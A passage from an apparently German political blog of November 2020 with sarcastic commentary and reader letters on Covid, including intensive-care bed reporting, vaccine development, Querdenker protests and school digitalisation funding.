Corona wurde nur erfunden, um Trump aus dem Weißen Haus zu jagen!
Corona wurde nur erfunden, um die BLM-Proteste zu ermöglichen!
Ein Jahr Pandemie, und nur eine Million Tote
Reinfektionen sind doch gar nicht bestätigt!
Na gut, Reinfektionen sind bestätigt, aber nur bei ganz wenigen Menschen!
Falsch-positive Tests sind viel schlimmer als falsch-negative!
H E R D E N I M M U N I T Ä T !
Die Wirtschaft ist doch schon wieder am Wachsen!
Die Situation ist unter Kontrolle
So nah an einem Impfstoff
"Die Medien ..."
Corona ist im April/Mai/Juni/Juli/August/September/Oktober/November/Dezember/2021/2022/whatever vorbei!
Die Linke will doch nur das Land beerdigen!
Ich habe ein gutes Leben gelebt!
Originalzitat von Bill Mitchell: "While death is sad for the living left behind, for the dying, it is merely a passage out of this physical body to a spiritual existence, free of this mortal coil. If one turns off the radio, the music is still there. For all we know, the dead weep for us."
Update: Plandemic
5G
[l] Erinnert ihr euch an das Bundesverwaltungsgericht zu den Drohnenmorden der Amerikaner?
Wer sich jetzt dachte, dass das auch für andere Länder als die USA gilt, der sieht sich getäuscht. Wenn es um Assads angebliche Giftgasangriffe geht, dann hat die Justiz das Memo noch nicht gekriegt.
Klar, vor dem Gesetz sind alle gleich. Aber die Amerikaner sind ein bisschen gleicher. Das Gesetz muss noch gemacht, das Urteil noch gefällt werden, das unsere Regierung nicht für die Amerikaner brechen oder beugen würde. (Danke, Fritz)

Wed Nov 25 2020

[l] Noch ein Leserbrief zu Intensivbetten:
Ich arbeite u.A. auch auf einer Intensivstation in Norddeutschland. Wir haben 8 Betten, davon 6 Beatmungsplätze, welche mit dem zur Verfügung stehenden Personal (Pflege) eigentlich nicht bedienen sind. Häufig muss man ein Auge zudrücken, was geforderte Personalstärke auf einer Intensivstation angeht. (Patienten/Pfleger/Schicht < 2,5) Ein Stockwerk niedriger auf der Isolierstation gibt es seit April 6 weitere Beatmungsbetten. …so heißt es zumindest. Die Tür ist abgeschlossen, ich kenne niemanden, die sie gesehen hat und die etwa 12 Intensivpfleger, die man für die 6 Betten bräuchte wären mittlerweile wohl auch hinter dieser Tür verhungert.
Es nervt dadurch gelegentlich intensivpflichtige Patienten durch den Rettungsdienst zu bekommen, welche man eigentlich gar nicht adäquat versorgen kann. Man kann nach außen nämlich nicht kommunizieren, dass die Kapazitäten ausgelastet sind. Formal sind sie es nicht.
Schlussendlich werden wir die Patienten, die zu uns kommen schon versorgen, das aber trotz und nicht dank unserer Geschäftsleitung. Die hat vor wenigen Wochen unsere große Isolierstation (den "grünen" Bereich für Verdachtsfälle) zur geriatrischen Rehastation gemacht hat. Die Räumlichkeiten können so lukrativer genutzt werden (so wurde es sogar begründet).
Beatmete Covidfälle können wir gerade nicht adäquat isolieren. Das ist keine Meinung, das ist Fakt. Das zu ändern würde heißen elektive Operationen und damit eine Einnahmequelle auszusetzen, da man räumliche Umbaumaßnahmen auf der Intensivstation vornehmen müsste. Dann verliert man Bettenkapazität durch Schleusen, welche man für 90 jährige Hüften und so weiter braucht. Ein Schwesterklinikum, welches bisher die beatmungspflichtigen Patienten übernommen hat, hat die Zusammenarbeit an einem Samstag telefonisch eingestellt, ebenfalls um ihr Elektivprogramm nicht zu gefährden. Wirds haarig, ist sich halt jeder selbst der Nächste.
Die Empfehlung, dass Covidpatienten versorgende Personal nicht in Kontakt mit anderen Nicht Infizierten oder Personal aus anderen Abteilungen kommt, ist logischerweise nicht umsetzbar ohne mehr Personal einzusetzen. Dies ist nicht gewünscht. Aus Kostengründe müssen Überstunden abgebaut werden und nicht angesammelt. Ich ziehe mich z.B. auf der Isolierstation (ja die mit den nachgewiesen Infizierten) um, trinke dort meinen Kaffee und gehe danach auf eigentlich alle anderen Stationonen, incl. der Wöchnerinnenstation, um meine Patienten zu versorgen.
Coronatests werden aus Kostengründen beim Personal nicht regelmäßig durchgeführt, obwohl dies gefordert wird (ausgenommen nachgewiesener Kontakt Kategorie I (s.RKI) dann werden wir tatsächlich getestet).
Habe am letzten Woche eigenmächtig bei allem erkältetem Personal in meinem Arbeitsumfeld Schnelltests durchgeführt (Allesamt Kontaktpersonen Kategorie III). Sehe eine reelle Chance dafür noch Probleme zu bekommen, schließlich kostet ein Test erschreckende 6€ im Einkauf. Das war es mir aber wert.
Es macht aktuell einfach keinen Spaß meinen Job zu machen. Das frustriert meine Kollegen und mich. Viele fliehen jetzt mittelfristig in Arztpraxen oder melden sich krank. Hätten wir nicht alle so ein schräges Pflichtgefühl gegenüber den Patienten und verbliebenden Kollegen, obwohl wir am Ende des Tages nur einfache Arbeitnehmer sind, würden wir alle hinschmeißen.
Berentete Ärzte werden aktuell übrigens für die Impfzentren rekrutiert. Möchte ich, dass mein Vater so etwas macht, anstatt zu Hause sich im Social distancing zu üben?
[l] Gaby Weber hat einen neuen Film gemacht, über die Covid-Strategien von Brasilien, Uruguay und Argentinien. Brasilien fuhr das eine Extrem ("ach watt, is bloß ein kleines Grippchen"), Argentinien das andere Extrem (fetten Lockdown mit Ausgehsperren). Uruguay fuhr das dritte Extrem und fuhr damit auffallend gut. Uruguay hatte, wie es Gaby ausdrückt, keine Restriktionen aber dafür eine gute medizinische Versorgung. Alle drei Länder sind wohlgemerkt auf der Südhalbkugel, d.h. die hatten gerade Winter, nicht wie wir Sommer. Eigentlich beste Voraussetzungen für eine Covid-Durchseuchung. Uruguay ist auch kein reiches Land.
Wieso sind die also nicht von Covid geplättet worden? Uruguay hat etwas über 3 Mio Einwohner.
Update: Ich krieg jetzt lauter Gegenwind, weil ich gesagt habe, Uruguay sei kein reiches Land. Das kommt auf die Perspektive an. Im Vergleich zu den Ländern außenrum ist Uruguay ein sehr reiches Land, es wird auch die Schweiz Südamerikas genannt. Ist es jetzt auch im Vergleich zu Europa reich? Das kommt auf das Vergleichsland an. Könnte man sicher anders sehen als ich.
[l] Zu den Intensivbetten kam noch ein Leserbrief rein:
Schon im Juli fiel auf, dass ein paar Intensivbetten wohl nur buchhalterisch existieren:
https://aerztezeitung.de/Politik/-411374
Für freigehaltene Intensivbetten zahlte und zahlt der Bund Tagespauschalen an die Krankenhäuser.
Oh ACH SO ist das! Na das erklärt natürlich einiges.
Seit Oktober sinkt die Zahl der betreibbaren Intensivbetten aber kontinuierlich.
https://www.intensivregister.de/#/intensivregister
(Reiter Zeitreihen, dritte Grafik von oben)
Neben Personalmangel durch Quarantäne halte ich auch bedauerlicherweise zuviel gemeldete Betten mancher Krankenhausbetreiber für denkbar. So ein Bluff hätte im Sommer mit wenig Erkrankten auch gut geklappt, Herbst und Winter wollen aber sehen lassen. Und ein paar Kliniken haben sich ehrlich gemacht.
Oder es war noch nicht einmal ein Bluff sondern - gibt es einen Komparativ zu Inkompetenz?
https://www.intensivregister.de/#/intensivregister
"Es gebe genügend Intensivbetten, aber nicht das Personal dazu."
"Zur Anzahl der betriebsfähigen Intensivbetten zählten aber nicht nur die vorhandenen Betten und Beatmungsgeräte, sondern auch das zur Behandlung nötige Personal. Dieses fehle, ohne Personal seien die vorhandenen Betten aber nicht betriebsfähig."
In Berlin haben die ja ein Corona-Not-Krankenhaus hingestellt. Hoffen die darauf, dass sich Personal dann von selbst dort ansiedelt, wie bei Dungeon Keeper?
Ach ich mache mir da keine Sorgen. Nach DEM Track Record des Berliner Senats?

Tue Nov 24 2020

[l] Auf den Intensivstationen in Deutschland arbeiten übrigens Leiharbeiter.
Ich bin Intensivpfleger bei einer Leiharbeitsfirma.
Falls ihr bisher nicht so hingeguckt habt, weil ihr die Details nicht wissen wolltet, aus Furcht, sie könnten ganz furchtbar sein, dann habt ihr die Lage völlig richtig eingeschätzt. Hier ist seine Antwort auf die Frage, wie er mit dem Infektionsrisiko umgeht:
Nun: Es ist mein Beruf. Ich hatte auch davor schon mit kranken und ansteckenden Patienten zu tun. Etwa solche mit Tuberkulose oder resistenten Keimen. Der Unterschied ist jetzt nur: Davor war immer ausreichend Schutzausrüstung und Personal vorhanden.
Ach komm, wer braucht schon Schutzausrüstung und Personal! Geht ja hier nur um eine Pandemie mit immungeschwächten Patienten auf der Intensivstation. Da kann gar nichts passieren. Daher lässt man auch infizierte Pfleger weiterarbeiten.
Was mich vielmehr beschäftigt als das Ansteckungsrisiko: Es wurden noch immer keine neuen Konzepte vorgelegt. Es gibt keine Anreize, jetzt den Pflegeberuf zu ergreifen. Ganz im Gegenteil. Stattdessen sollen sogar infizierte Pfleger und Ärzte weiterarbeiten.
Toller Plan. Wenn jemand stirbt, war das halt Gottes Plan, nicht wahr? Immerhin hat das Krankenhaus nochmal ordentlich Reibach gemacht mit den letzten Tagen vor dem Ableben.
Hey, warte mal, wenn wir schon einen Intensivpfleger an der Leitung haben, können wir ihn doch auch mal fragen, was von den Auslastungsstatistiken zu halten ist, die da rumgehen und so aussehen, als sei noch Luft!
Ein Teil der Intensivbetten, die da immer vermeldet werden – das sind in Wahrheit keine Betten auf Intensivstationen. Das sind Notfallbetten. Provisorisch geschaffene Beatmungsplätze. Auf anderen Stationen, in anderen Räumen.
Er meint dann noch: Kann sein, dass die ein Beatmungsgerät haben, oder auch nicht. Das Personal ist jedenfalls nicht für den Umgang mit Intensivpatienten geschult und muss plötzlich Dinge leisten, die sie noch nie gemacht haben. Oh, und: Sie müssen in Schichten arbeiten.
Ja gut, aber immerhin sind noch Betten frei!1!! Nun, …
Wenn ich sage, dass wir beispielsweise 25 Covid-Patienten auf unserer Intensivstation haben – dann bekomme ich als Reaktion häufig ein „Echt, nur?“. Vielen sind die Verhältnisse gar nicht klar. Die Intensivstationen waren ja vor Corona schon voll. Da waren vielleicht ein, zwei Betten frei. Aber nicht mehr.
Gut, dass wir das mal geklärt haben.
OK, aber die Politik hat das im Griff. Ich meine, die haben die Weichen gestellt, nicht wahr? Sich zumindest informiert?
Ich habe beispielsweise schon mit Sahra Wagenknecht sprechen können. Sie hat Interesse gezeigt, mir eineinhalb Stunden zugehört, und sie tut es noch immer. Wir stehen auch jetzt noch im Kontakt, sie fragt, wie es mir uns meinen Kollegen geht. Persönlich, nicht über Dritte. Das finde ich wirklich toll. Herr Spahn hat auf meine Anfragen bisher nicht reagiert.
Ja gut, der Spahn ist ja auch … äh … naja der wird auch andere Berater haben. Fachkundige Berater. Von Pharmaunternehmen oder so.
Update: Der Bayerische Rundfunk schlägt in eine ähnliche Kerbe.
Das intensivmedizinische Personal kritisiert außerdem, dass das Intensivregister der DIVI, das freie Intensivbetten auflistet, etwa das Vorhandensein von Dialysegeräten nicht erfasst. Gerade kleinere Krankenhäuser hätten oft keine oder nur wenige Möglichkeiten zur künstlichen Blutwäsche. Dabei brauche jeder dritte Corona-Intensivpatient dieses Nierenersatzverfahren.
"Die Zahl der Betten stimmt nicht." / "Da wurden Kapazitäten gemeldet, die der Phantasie entsprungen sind. Die sind beim Rettungsdienst abgemeldet, bei der DIVI aber verfügbare Betten." / "Neulich lag einer zwei Tage im Aufwachraum und in unserem Meldesystem stand aber, dass Intensivbetten frei wären." Anonymisierte Zitate aus Gesprächen mit intensivmedizinischem Personal
Die DIVI bestätigt die Berichte des intensivmedizinischen Personals. Im BR-Interview räumt ihr Sprecher, Professor Christian Karagiannidis, ein, es gebe einzelne Kliniken, in denen unter anderem Geschäftsführer vorgäben, dass eine höhere Bettenzahl gemeldet werden solle, als tatsächlich vorhanden sei.
Wow. Na das ist ja mal VOLL für den Fuß dann. (Danke, Sven)

Mon Nov 23 2020

[l] Es gibt jetzt noch einen dritten Covid-Impfstoff, diesmal von der Uni Oxford. Im Gegensatz zu den Impfstoffen Biontech und Moderna ist dieses offenbar eine traditionelle aktive Impfung, wo tote oder abgeschwächte Viren verabreicht werden, damit das Immunsystem den Erreger gefahrenarm kennenlernen und Abwehr aufbauen kann. Die Impfstoffe von Biontech und Moderna sind im Vergleich dazu eine völlig neue Technik, die daher noch nicht durchoptimiert ist und besondere Kühlung und Lagerung braucht und pro Dosis das 10-20fache der Oxford-Impfung kostet.
Die Oxford-Impfung hat auch weniger Wirkungsgrad, aber das lässt sich (wie man es jetzt schon auch bei anderen Impfungen praktiziert) ausgleichen, indem man einfach mehrfach impft. Das heißt dann leider auch, dass erst ab der 2. Impfung ein 90% Schutz besteht, und die 2. Impfung ist sowas wie einen Monat nach der 1.
Dafür ist dieser Impfstoff sehr billig herstellbar (unter 5 Euro pro Dosis) und kann einfach im Kühlschrank gelagert werden, muss nicht gefroren werden und schon gar nicht mit flüssigem Stickstoff oder so.
Ich finde es ja ehrlich gesagt sehr beunruhigend, dass jeder dieser Impfstoffe direkt mit einem Vertreter der Pharmamafia entwickelt wurde.
Wenn ich das richtig verstanden habe, dann hat Biontech diesen Impfstoff im Wesentlichen für 50 Mio € von der Bundesregierung entwickelt. Pfizers Rolle besteht darin, jetzt groß wie ein Gorilla sich auf die Brust zu schlagen und am Ende die herunterregnenden Geldscheine aufzufangen. Wie die Verteilung der Arbeit bei Moderna aussieht weiß ich nicht, aber da steht das war eine Kooperation mit dem NIAID (National Institute of Allergy and Infectious Diseases). Bei dem Oxford-Ding war das wieder eine Uni aber den Profitregen sackt ein Pharmaunternehmen ein, nämlich AstraZeneca.
Ist mir ein völliges Rätsel, wieso wir als Gesellschaft das zulassen. Bei Biontech und Pfizer hat mich das besonders geärgert, denn Pfizer hat offenbar auch noch Fördergelder von der US-Regierung eingesackt. Dafür, dass sie nicht die Arbeit gemacht haben, denn die hat Biontech gemacht. What the FUCK?
Update: Ein Leser hat bessere Daten zur Pfizer-Biontech-Kooperation gefunden. Da sind doch größere Beträge geflossen, wobei sich das so anhört, als sei das für die klinischen Tests gewesen, nicht für die Impfstoff-Entwicklung.
Update: Leserbrief:
ein paar Informationen zu den Corona-Impfstoffen:
- Um genau zu sein, ist der Impfstoff der Uni Oxford ein Vektorimpfstoff, kein Totimpfstoff. Im Gegensatz zum Totimpfstoff bekommt man beim Vektorimpfstoff einen aktiven Virus verabreicht, der aber für den Menschen ungefährlich ist (in der Regel ein Affenvirus). Dieser wird um die Erbinformationen des Corona-Virus ergänzt um die passende Immunreaktion auszulösen.
- Der Oxford-Impfstoff hat leider nur einen mittleren Wirkungsgrad von etwa 70% nach 2 Dosen. Die 90% waren nur bei einer der beiden Dosierungsstudien erreicht worden.
- Der mRNA-Impfstoff von Moderna ist auch bei höheren Temperaturen (Kühlschranktemperatur) über längere Zeit stabil. Nur der Impfstoff von Biontech scheint ein Problem mit den Temperaturen zu haben.
- Ich finde es zwar auch schade, dass hier die Pharmagrößen direkt mit im Boot sind, aber anders wäre es leider nicht möglich, den Impfstoff schnell in großen Stückzahlen zu produzieren. Biontech, Moderna, Uni Oxford, etc. haben meines Wissens nach keine großen Produktionsstätten.
Update: Besserer Link für die finanziellen Details.

Sun Nov 22 2020

[l] Oh gucke mal, geht doch! Sieht aus als ob sie Abstand halten und ich sehe auch ein paar Masken oder Schals, sogar mehrheitlich...? Und es ist ein Schweigemarsch, d.h. wenig Aerosolausstoß.
Wenn ihr schon unbedingt gegen Covid-Maßnahmen demonstrieren wollt, dann bitte so!

Sat Nov 21 2020

[l] Das mit der Sophie Scholl-Jacke neulich war übrigens kein Einzelfall. Das geht bei den Quer"denkern" als Trope herum. Wir hier sind die Guten.
Gut, ist nicht überraschend. Jeder ist in seiner eigenen Story der Held. Die arme junge Frau hat bloß nicht mitgekriegt, auf welcher Seite die Nazis kämpfen, bevor sie sich als die neue Sophie Scholl bezeichnete.
Ich glaube ja, dass das was damit zu tun hat, wie heutzutage Kinder erzogen werden. Das passiert, wenn jemand sein Leben lang noch nie mit der Idee konfrontiert wurde, dass er einen Fehler gemacht hat. Die Reaktion der Sophie 2.0 hier wirkt auf mich jedenfalls so, als war das das erste Mal, wo ihr jemand ins Gesicht sagt, dass sie keine Mitmach-Medaille kriegt, keine "Bei uns gibt es keine Verlierer"-Urkunde, dass was sie gerade gesagt hat, sie in zivilisierter Gesellschaft für die weitere Teilnahme disqualifiziert.
Entsprechend geht sie auch direkt in die Denial-Phase über und glaubt, der Ordner, der da hinwarf, sei halt irgendwie komisch. Als er weg ist, zündet sie dieselbe Stinkbombe nochmal. Das kommt in ihrer Welt nicht vor, dass sie Mist macht. Was heißt hier EIN Geisterfahrer! HUNDERTE!!
[l] 20 jähriger stirbt spontan kurz nach dem 1. Fußballtraining seit seiner Covid-Infektion. Aber Fefe, der Sample Size ist doch voll klein. Wir wissen doch gar nicht, dass das eine Covid-Spätfolge ist?
Ja ihr habt völlig Recht. Das ist noch gar nicht ausreichend wissenschaftlich gesichert, dass Nikotin Lugenkrebs macht. Bevor da nicht mindestens ein paar hundert Millionen dran kläglich verreckt sind, ist die Sample Size doch viel zu klein, um irgendwelche staatlichen Maßnahmen zu verhängen, die am Ende der Zigarettenwirtschaft schaden! Im Übrigen betrifft das Kinder kaum. Kinder mit Lungenkrebs sind voll selten. Das sind die Alten, die das trifft! Die Kinder können wir ruhig weiter in der Schule rauchen lassen!1!!
Update: Solange es noch Stellen auf dem Planeten gibt, bei denen einmal im Jahr die Temperatur unter Null ist, kann von einer wissenschaftlichen Untermauerung der Schädlichkeit der Klimawandels auch keine Rede sein.
Hey, wisst ihr was? Man sollte die Ghostbusters-Strahlen mal kreuzen! Pass uff, hier kommt es: Covid ist doch gar nicht menschengemacht! Da müssen wir also auch nichts gegen machen!!1! (Danke, Christian)

Thu Nov 19 2020

[l] Versöhnlicher Leserbrief:
ich habe mich schon im Frühjahr gewundert, daß Leute, die sich bisher vor allem für ganz andere Sachen interessiert haben, plötzlich von "Grundrechtseinschränkung" und "Merkeldiktatur" redeten.
Aber die haben einfach nicht mitbekommen, daß die Polizeigesetze aus den letzten Jahren der Polizei erlauben, jede beliebige Person wegen fiktionaler Vergehen, die sie eventuell in einer fiktionalen Zukunft begehen könnten, für unbegrenzte Zeit wegzusperren. Und die haben auch nicht mitbekommen, daß schon vorher Leute wegen angeblicher Verbrechen jahrelang in die Psychatrie eingesperrt werden konnten, ohne ihre Rechte auf einen fairen fairen Prozess wahrnehmen zu können. Oder daß Leuten, die ihr Demonstrationsrecht in Anspruch nehmen, um gegen einen Bahnhofsneubau zu demonstrieren, von Wasserwerfern die Augen rausgeschossen werden können. Oder daß das ständige Abhören all unserer Kommunikation mit keiner Grundrechtsdefinition zu vereinbaren ist. Oder daß Nazi-Freicorps mit nachgewiesener finanzieller und organisatorischer Unterstützung der staatlichen Behörden mordend durch die Straßen ziehen konnten. Oder daß Leute mit aktiver persönlicher Beihilfe unseres Außenministers in einem Foltergefängnis jahrelang gewaterboardet werden können. Oder daß Journalisten, die einmal ihren Job gemacht und Informationen über Kriegsverbrechen veröffentlicht haben, in einem Foltergefängnis landen - ohne Aussicht auf einen fairen Prozess oder überhaupt irgendeine Zukunft.
Und dann betrifft sie das selbst einmal, und dann denken sie, daß ist etwas zuvor nie Dagewesenes. Und daß sie die Einzigen sind, die davon betroffen sind. Weil sie eine Maske tragen müssen. Nicht weil sie in die Psychatrie oder in ein Foltergefängnis eingesperrt oder mit dem Tod bedroht wurden. Sondern weil sie im Bus für eine halbe Stunde eine Maske tragen müssen, während eine globale Pandemie herrscht.
Da ist nicht (nur) Dummheit und Ignoranz im Spiel, sondern vor allem Unwissenheit. Aber woher sollen sie diese Dinge erfahren? Aus der Tagesschau oder den Radio-Energy-Nachrichten?
Update: Sagt mal, da gibt es doch bestimmt einen tollen Fachbegriff für, wenn man Dinge erst wahrnimmt, wenn sie einen selbst betreffen. Kennt den jemand?
Update: Ein Leser kannte den Fachbegriff: Verfügbarkeitsheuristik.
[l] Na, noch gute Laune übrig? Keine Sorge! Hier ist ein Leserbrief, der Abhilfe schaffen wird.
die Digitalpakt-Geschichte ist noch viel schlimmer als man sich vorstellen kann. Ich bin einer jener Lehrer, die diesen in der Umsetzung bei uns an der Schule begleitet. (Vorgang: Schulleiter erhält Nachricht über Digitalpakt und die Bedingungen; delegiert Bildung einer AG- dessen Leiter ich bin - um Ist- und Soll-Zustand und pädagogische Begründungen des Nutzens in ein Konzept > 25 Seiten zu schreiben; diverse Treffen mit Schulverband, Schulleitung, etlichen Dienstleistern für Schul-IT, Endgeräte etc. …. und nebenbei läuft halt der tägliche Wahnsinn weiter und Unterricht soll auch gemacht werden)
Ein Kollege und ich machen das weil wir das aus Überzeugung in der Schule verbessern wollen und schon seit Jahren hinterher sind alles was möglich ist in Bewegung zu setzen. Wir haben immer versucht mit unserem Etat PC-Räume und Laptops auf einem nutzbaren Stand in hinreichender Anzahl zu haben. Wir haben selbstständig unser Schul-WLAN soweit ausgebaut, das es nahezu perfekt ist und wir uns somit eine Ausleuchtung für WLAN (die mal so eben 5000 € kostet bei 1500 € jährlichem Etat) sparen zu können. Flaschenhals ist unsere sagenhafte 16 Mbit Leitung, die wir partout nicht verbessert bekommen. Seit 6 Jahren versuchten wir, dass der Schulverband Glasfaser legen lässt, die 20 m an der Schule vorbei läuft, aber nie angeschlossen wurde (Kosten … ).
Jetzt gibt es einen Anschluss, der aber nur wegen des Ausbaus des Verwaltungsnetzes (Schulleitung) gelegt wurde.
Ich möchte an der Stelle kurz unterbrechen und meiner Verwunderung Ausdruck verleihen, dass wir so wenig Amokläufe an unseren Schulen haben.
Ein einfaches umpatchen und zack geht es mit 100, 200 oder gar 500 Mbit weiter …. natürlich nicht. Das ist nun ein Anschluss der vom Land bereitgestellt wird.Bedingungen: Nur Schulgeräte, nur pädagogische Inhalte. Heißt direkt für uns: Die Infrastruktur, über die alles zentral geregelt wird von unserem iServ-Server (DHCP etc.) ist nun quasi nicht mehr zu benutzen, weil wir sicherstellen müssen, dass keine privaten Geräte (die 80% der Lehrer natürlich nutzen für den Unterricht) das Schulinternet benutzen. Ferner müssen ein Schüler- und Lehrernetz eingerichtet werden, die getrennt sein müssen. Klar ginge das technisch sicherlich, bedarf dann aber vieler € und erschöpft dann einfachauch unseren Fähigkeiten und den Faktor Zeit.
Zurück zum ursprünglichen Digitalpakt (Zusatzpaket: Soforthilfe) und dem Ding mit den Leihgeräten. Mein Kollege und ich waren schnell und haben sofort alles zusammengeschrieben und gesucht Anfang der Sommerferien, als das Soforthilfeprogramm auf den Weg gebracht wurde. Wir haben einen 5-stelligen Betrag zugeteilt bekommen für eben diese Leihgeräte. Es sollte ein Mix aus Laptops und Tablets werden. Es dauerte 3 Monate! bis es weiterging seitens der Verwaltung. Natürlich waren unsere Angebote (wir haben 20 Stück eingeholt) hinfällig und landesweit waren - oh Wunder - alles Tablets vergriffen. Vor zwei Wochen dann haben wir 60 Laptops bekommen, die nichts mehr mit unseren Angeboten zu tun hatten. Nun gut, sie funktionieren und sind soweit geeignet. Allerdings haben wir 800 Schüler … nun gut dachten wir, dann haben wir immerhin 60 Geräte um die an Schüler zu geben die zu Hause gar nichts haben. Dann: nächstes Treffen mit dem Schulverband. Die Politik wünscht sich einheitliche, nachvollziehbare Verteilungsgrundsätze. Also wer bekommt was für ein Gerät aus welchem Grund? Nach kurzem Hinweis, dass wir als Schule objektive Gründe wie Einkommen, Hartz IV oder ähnliches wegen des Datenschutzes gar nicht erheben dürfen, wurde aber auch unser Vorschlag abgelehnt, dass die Klassenlehrer, die ja ihre Schüler und die häuslichen Umstände in der Regel gut kennen, entscheiden, wo so ein Gerät zu Hause definitiv benötigt wird. Das wäre dann zu willkürlich … und es muss einfach grundsätzlich jeder ein Gerät bekommen, der kein eigenes hat (Handy zählt nicht). Also: Umfrage gemacht ==> Ergebnis: Wir brauchen 150 Geräte - mindestens.
Aktueller Stand: Wir haben Geräte, dürfen sie aber nicht herausgeben, weil wir zu wenig haben, um diese Zahl zu bedienen. Es wäre politisch ja nicht zu begründen warum jemand eines bekommt und ein anderer nicht …
Mal ganz unironisch jetzt. Wieso gibt es so wenig amoklaufende Lehrer? Weil die alle nicht mehr die Kraft haben oder was?
Es ist einfach nur noch alles ermüdend und alles was man anpacken möchte wird unnötig kompliziert gemacht. Der eigentliche Digitalpakt übrigens (was viele nicht wissen) soll zu 70% in die Infrastruktur gehen und nur 30% für Endgeräte sein. Unsere Schule bekommt einen niedrigen 6-stelligen Betrag zugewiesen von dem dann Switches, Lichtwellen, WLAN, Ethernetdosen in den Räumen etc hauptsächlich gelegt werden sollen und genau diese Infrastruktur funktioniert ja bei uns sehr gut und muss gar nicht groß aufgerüstet werden. Dennoch wird dann das Geld einfach genutzt um es zu machen, da es sonst verfallen würde. Endgeräte bedeutet dann übrigens auch sowas wie Whiteboards, Dokumentenkameras, Laptops in den Klassen. Also lange Rede, kurzer Sinn: Das Geld wird nicht dafür genutzt werden, was bei uns an der Schule direkt gewünscht oder benötigt wird. Und der Hinweis von mir bei der letzten Konferenz, das man doch auch bitte Administration einpreisen möge, hat dann auch nur für Zusagen gesorgt mit dem Hinweis, dass man absolut dafür ist, man aber gucken müsse, ob man dafür dann woanders noch Geld herbekommt.
Und jetzt der letzte Gedanke aus Erfahrung: Wenn morgen ein Beamer kaputt geht, dann tauschen ein Kollege oder ich die Birne sofort aus, weil wir für Spare-Vorrat gesorgt haben und auf Einheitlichkeit gesetzt haben. Wenn von etwas Restgeld ein motivierter Admin bezahlt werden soll, der 5 Schulen im Schulverband betreut und der bitte nicht erst einen Termin für ein Problem zwei Tage später hat, damit Unterrichtsräume weiter genutzt werden können …. tja, da sehe ich schwarz.
Ich weiß nicht, wie es euch geht, aber ich krieg da Gewaltfantasien, wenn ich sowas lese.
Hey, psst, versteht ihr eigentlich, wieso weltweit Populisten Stimmen einfangen können, wenn sie versprechen, das alles einmal niederzubrennen?
[l] Ich frage mich, ob wir einfach die falschen Metaphern verwendet haben.
Seht Covid mal wie eine Schnittwunde. Sagen wir mal: In den Finger geschnitten.
Jetzt kommt der schwierige Teil. In der Analogie vergleichen wir bei der Schnittwunde Körperzellen mit bei Covid Menschen.
Wenn du dir in den Finger schneidest, könnte jede Körperzelle genau so argumentieren wie die Covidioten bei Covid. Ach komm, an Schnittwunden stirbt doch keiner. Die paar, die daran sterben, sind bestimmt schon tot. Zellen wachsen nach. Das heilt.
Aber das ist nicht die Perspektive, die an der Stelle sinnvoll ist. Die sinnvolle Perspektive ist die aus Sicht des ganzen Körpers. Und was der tut ist ja wohl allen Anwesenden völlig klar. Erstmal die Wunde auswaschen, dann vielleicht ein bisschen Jodspray oder Heilsalbe drauf, dann Pflaster drüber. Warum? Weil du genau weißt: Wenn du es nicht tust, wird es schlimmer.
Folgende Gedanken gehen durch deinen Kopf. Ist die Wunde tief? Ist sie groß? Muss sie genäht werden? Muss ich ins Krankenhaus? Hab ich eine aktuelle Tetanus-Impfung?
Niemand würde da anfangen und rumargumentieren, dass man nichts machen muss. Schon gar nicht, wenn die Wunde zu eitern anfängt.
Bei der Wunde wissen wir, was passieren kann. Vielleicht eine Blutvergiftung. Vielleicht ist das Immunsystem davon geschwächt und man tritt sich noch irgendeine andere bakterielle Infektion ein.
Genauso ist es bei Covid. Da wissen wir auch, was passiert. Wir wussten von Anfang an, was für Risiken es gibt. Einige der Risiken ahnten wir, bevor wir sie nachweisen konnten. Aber was zu tun war, das war von Anfang an klar. Nur haben wir eben nicht als gesamter Körper reagiert, wie es nötig gewesen wäre, sondern wir haben eine Demokratie gemacht, und da haben ein paar Fettzellen vom Hinterschinken mit ein paar Tote-Haut-Zellen von der rechten Ferse zusammen entschieden, dass der Finger weit weg ist und das schon nicht so schlimm ist. Dann eiterte der Finger. Für die Ferse immer noch kein Problem. Inzwischen ist der ganze Unterarm dunkel angelaufen.
Wisst ihr, über was man bei so einem Zustand in unserer Schnittwunden-Analogie im Krankenhaus nachdenkt? Ob der Arm amputiert werden muss.
Beim Wort Amputation wird dem Hirn klar, dass man vielleicht mal was tun sollte, und es überstimmt die normalen Automatismen. daher haben wir jetzt das neue Impfgesetz.
Wieso rede ich so despektierlich von den Covidioten? Der Tagesspiegel berichtet (leider nur Papier / Paywall) wie folgt von der "Quer""denker"-Demo in Berlin: Von Reichsbürgern und vereinzelten Hitlergrüßen, von Äußerungen wie dass man Jens Spahn abholen und nach Auschwitz bringen würde. Niemand widerspricht oder distanziert sich. Vor dem Brandenburger Tor steht ein Redner, der sich Tampons vor den Mund geschnürt hat und predigt von Satanisten und dem Pfuhl der ewigen Verdammnis. Keiner im Publikum widerspricht oder grinst auch nur. Und dann das hier:
Da ist auch der Trommler, der einen Polizisten überreden will, sich den Protesten anzuschließen. Er selbst habe Nazis früher auch als seine Feinde betrachtet, sich vor ihnen gefürchtet, sagt der Trommler. Aber diesen Sommer habe er gemeinsam mit Nazis auf einer Stoffdecke zusammen meditiert, seitdem fürchte er sie nicht mehr. „Das ist heute eine ganz andere Generation von Nazis.“
Seht ihr? Ist gar kein Problem. Das sind die neuen, fluffigen Nazis! Die wollen doch nur spielen!
[l] Mann ist das absurd gerade.
Wie viele Mails ich gerade kriege zum Infektionsschutzgesetz.
Also erstmal: Ich habe keinen von diesen Leuten da hin gewählt. Wieso erzählt ihr mir das?
Ich finde es an sich sehr erfreulich, dass sich jetzt plötzlich jemand darum schert, wenn in diesem Land Grundrechte eingeschränkt werden.
Aber wisst ihr was? Ich finde das auch nicht toll, dass Grundrechte eingeschränkt werden, um eine Pandemie zu bekämpfen.
Mir wäre das auch viel lieber gewesen, wenn das nicht nötig gewesen wäre, weil ihr euch alle freiwillig sozial isoliert und Masken tragt und unnötiges Wohnungsverlassen vermeidet. Hättet ihr das ein paar Wochen durchgezogen, hätten wir jetzt nicht seit Monaten Lockdown.
Es wäre egal gewesen, wie inkompetent die Regierung ist.
Es wäre egal gewesen, wie kaputt das Gesundheitssystem ist.
Aber nein. Das war ja nicht drin. Lieber Covid leugnen, dann kleinreden, dann ohne Maske und Abstand Anti-Covid-Demos machen, dann sehen wie die Fallzahlen hochschnellen, und jetzt über die Regierung meckern, weil die Scheune brennt und die kopflose Hühner sind.
